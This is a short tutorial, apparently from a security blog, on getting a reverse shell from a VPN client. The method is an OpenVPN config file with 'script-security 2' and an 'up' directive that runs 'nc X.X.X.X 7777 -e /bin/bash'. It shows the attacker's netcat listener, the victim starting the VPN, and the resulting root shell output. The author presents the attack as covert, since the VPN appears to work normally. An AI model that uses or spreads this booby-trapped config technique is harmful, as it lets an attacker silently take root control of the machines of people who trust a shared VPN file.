In this occasion, we will learn how to get a shell on a remote computer acting as a VPN client, using the possibility of executing commands just after starting the VPN. Of course, the client must completely trust us or have somehow modified their VPN config. The best thing about this attack is that everything will seem to work normally while the connection is established in the background.
We put our netcat on listening mode to receive the reverse connection:
KettleBell ✺ ~> nc -l -p 7777
We configure the VPN file to execute a script when starting:
vi client.ovpn
script-security 2
up "/usr/bin/nc X.X.X.X 7777 -e /bin/bash"
The victim starts the VPN:
DirtyCow ~ # openvpn –config client.ovpn
In the netcat terminal, we get a nice shell:
KettleBell ✺ ~> nc -l -p 7777
id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video)
uname -a
Linux DirtyCow 4.9.95-gentoo-kr0m-ipv6-YAMA #1 SMP PREEMPT Wed Apr 25 10:22:48 CEST 2018 x86_64 Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz GenuineIntel GNU/Linux